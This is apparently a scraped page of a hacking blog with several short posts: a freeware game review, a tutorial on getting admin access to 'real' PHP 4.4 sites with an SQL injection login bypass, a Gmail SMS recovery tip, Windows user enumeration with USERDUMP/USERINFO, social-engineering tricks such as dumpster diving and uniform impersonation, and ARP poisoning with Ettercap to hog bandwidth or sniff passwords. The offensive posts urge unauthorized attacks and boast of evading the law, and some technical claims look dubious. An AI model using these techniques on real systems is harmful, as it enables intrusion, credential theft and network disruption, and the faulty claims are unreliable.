Celebrating the 10th anniversary of LF2,it was updated to version 2.0 which improved the gameplay,added recording mode and a survival mode.There is a dedicated fanbase for LF2 and every now and then,a new mod pops up which says “play me !!” and its almost as addictive as the original game. My favorite mod is LF2 1.5 or LF2 Reinforced which gives DBZ styled powers to the characters and makes up for an insane brawling experience.And the best part of this is that LF2 is a freeware !!! Talk about cream of the top..

My Recco – Get it,play it with your best friend or your worst enemy,its worth its salt.

Download Little Fighter 2

Download Little Fighter 2 Reinforced Mod

 

Keep Brawling

 

POSTED BY XERO .ALL RIGHTS RESERVED.

Technorati Tags: game downloads,freeware,reviews,gaming,rdhacker,prohack,free game,little fighter 2

read more "Little Fighter 2 Rockz"

Hacking PHP 4.4 sites in 20 seconds

Now here is  a real hacking tutorial in which I am going to hack a real website,and that too in less than 20 seconds.and I am not kidding. Actually sites with PHP 4.4 have a SQL injection vulnerability in them which makes their Admin control panel easily accessible,and I mean in one big shot,you will be admin of that site.

Remember,this tutorial is applicable on PHP4.4 machines with Apache running in parallel with them.Also,since I will be hacking REAL websites,I will not be displaying their URL’s or else I will be gunned down (by law of course :P).It will be partial in nature,that is I WILL not be teaching each and everything to you,I assume you know basics of SQL injection/PHP injection/Google searching,and if you don't then read these articles first -

Google Search Tips for Hacking

Google Secrets – Some Cool Google Dorks

Basics of SQL Injection

SQL injection by example

Simple Nmap Scanning

 

In the mean time,here is how you can start -

Step 1 – Search for them

Yep,make a Google dork to find sites running Apache and PHP 4.4 . Its quite easy.

Step 2 – Scan them

Start by scanning them using Nmap,Do and intense scan and find the open ports. If you find port 2000 open,then you have almost got it. most websites running PHP4.4 have this port for admin login.

Now just login using port 2000 ie -

http://www.website.com:2000

and you will be comfortably login into admin page like this -

Step 3 – Hack them

Now in the fields,you have to type -

username – admin

password – a’ or 1=1 or ‘b

domain - a’ or 1=1 or ‘b

and press go,you will login into admin

voila..you have hacked into admin. Actually sites based on PHP 4.4 have the vulnerability in them that they are vulnerable to SQL injection.It will literally take 20 seconds.

I hope that was informative :P go learn something.

 

Cheers

POSTED BY XERO.ALL RIGHTS RESERVED.

Technorati Tags: hacking,how to,security,tutorials,rdhacker,prohack,php injection,sql injection

read more "Hacking PHP 4.4 sites in 20 seconds"

Recover Email Password using SMS

First of all..I would like to say that Gmail is out of Beta..yep..After a long time when they have integrated the best of world in their email system,it was the right  time to rip off the tag,and they did it.Further,with the world going mobile,they took some of the steps to better  enhance the security even a notch above than other email services. It helps to know that even the best of us forget our passwords from time to time and In fact,the sheer amount of people visit Gmail help center everyday just to recover their passwords. To help with these situations, Google went a step ahead by adding the ability to recover your password via text message.

In order to access this feature,sign in to your account and select ' Change Password Recovery Options ' enter your cell phone number and click ' Save '
The Next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.
In general, it's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and security question. And don't forget to keep them up-to-date.
Afterall,we all make mistakes :P

Cheers and Keep Learning

POSTED BY XERO .ALL RIGHTS RESERVED .Source – Official Gmail Blog – Page1,Page 2 .

Technorati Tags: internet tips and tricks,tips n tricks,rdhacker,prohack,google,gmail,account security,security,password

read more "Recover Email Password using SMS"

Enumerate User Information

Enumerate User Information from Target: USERDUMP

The USERDUMP application is designed to gather user information from the target. Some of the information enumerated is the user RID, privileges, login times, login dates, account expiration date, network storage limitations, login hours, and much more.

From a DOS prompt type the following syntax:

userdump \\Target IP Address Target Username

The results reveal the following username Administrator details:

The User ID is 500. (This tells us that this is indeed the real Administrator account.)

The user’s password never expires.

The Administrator last logged in at 12:44 a.m. on January 16, 2004.

The account has had 9 bad password attempts.

The Administrator has only logged in to this computer 2 times.

The PasswordExp is set to 0. (This tell us that the password never expires.)

The logon hours are all set to 1. (This tells us that the Administrator can log

in 24/7.)

Other information.

The username Administrator details have been successfully enumerated via the USERDUMP application.

Exploit Data from Target Computer: USERINFO

The USERINFO application is designed to gather user information from the target. Some of the information enumerated is the user RID, privileges, login times, login dates, account expiration date, network storage limitations, login hours, and much more. An attacker uses this information in his or her social engineering phase of an attack.

From a Disc Operating System (DOS) prompt type the following syntax:

userinfo \\Target IP Address Target Username

Notice the results returned with USERINFO are identical to the USERDUMP application

---Regards,
Amarjit Singh

read more "Enumerate User Information"

Social Engineering Techniques: Dumpster Diving

Information that companies consider sensitive is thrown out daily in the normal garbage cans. Attackers can successfully retrieve this data by literally climbing into the company dumpsters and pilfering through the garbage. Information such as names, Social Security numbers,

addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere. I personally know a nationally recognized movie rental company that still uses carbon paper in its fax machine. Once the roll is used up they simply throw the entire

roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay for their movies, and so forth.

Another social engineering attack that also proves to be very successful is when an attacker dresses in the uniform of those personnel considered “honest” and “important” or even “expensive.” For example; an attacker purchases/steals the uniform of a carrier, telephone, or gas or electric employee and appears carrying boxes and/or clipboards, pens, tools,

etc. and perhaps even an “official-looking” identification badge or a dolly carrying “equipment.” These attackers generally have unchallenged access throughout the building as employees tend to see “through” these types of people. When is the last time you challenged

one of these personnel to verify their credentials?

This attack is very risky as the attacker can now be personally identified should he or she get caught. Again, this attack is normally very successful so bear this in mind.

---Regards,
Amarjit Singh

read more "Social Engineering Techniques: Dumpster Diving"

Getting Max Internet Speed using ARP Poisoning

Ever thought of stealing bandwidth of internet in a local Lan ? well..I usually do it when I am surfing net at night and need more speed for downloading games and movies..and you can do that too. Well its done using ARP Poisoning..Sounds geeky but its the technical name of network sniffing.Basically,sniffing is used to get passwords – encrypted or unencrypted in a network. But it can also be used to choke the network bandwidth and getting maximum bandwidth in a single system. For those who don't know how it happens,lemme give you a little insight on how it happens.

Below is an example of a normal network.Now as we can see,that we are working on a laptop and we have to sniff out a target computer .All the systems are getting data via a switch which is itself connected to a router.The Router has a MAC address which is in this case is not binded to a particular IP. All the data is routed to a switch which is catered to systems using a switch.

The systems connect to router through the MAC address of router.Technically,we have to spoof the MAC address of router so all the data is sent through our system (the laptop in this case) and we are able to see and analyze each packet of data.In simple words this process of spoofing is known as ARP poisoning.Also,in normal condition,data sent through LAN is unencrypted in nature.

As we can see in the above diagram,we have now spoofed the MAC address and the data is sent through our system and we can view passwords and data.

But hey wait..I said that I will tell you how to get maximum speeds ain’t it ? well..its easy. When you poison a network,and spoof the address,but if you have not yet started sniffing,then all the systems will look for data to your system and will not be able to access net.And you will be playing with full bandwidth !!!

To do this, Download Ettercap and poison the network (shift + U then control + S ..do some homework and get the idea) but DONT START SNIFFING.Once you have poisoned it,you will be able to surf internet at maximum bandwidth whereas others wont.I used to do it in my net connection at night so nobody was able to complaint and stop it as soon as my downloads finished so I was way away from the hands of Law.BTW Ettercap is one of the best available tool for sniffing any network out there. I love it..

Download ETTERCAP

PS : If you wanna check if your network is sniffed or not, go to -

Start Menu –> Run –> type CMD and press Enter.

The type without quotes “ARP –a”

If you network is being sniffed,then all the MAC address will be the same.

 

I hope it was informative.

Keep Learning

 

POSTED BY XERO.ALL RIGHTS RESERVED.

Technorati Tags: Hacking,how to,proxy,security,tutorials,rdhacker,prohack,ettercap,ARP poisoning,getting max internet speeds

read more "Getting Max Internet Speed using ARP Poisoning"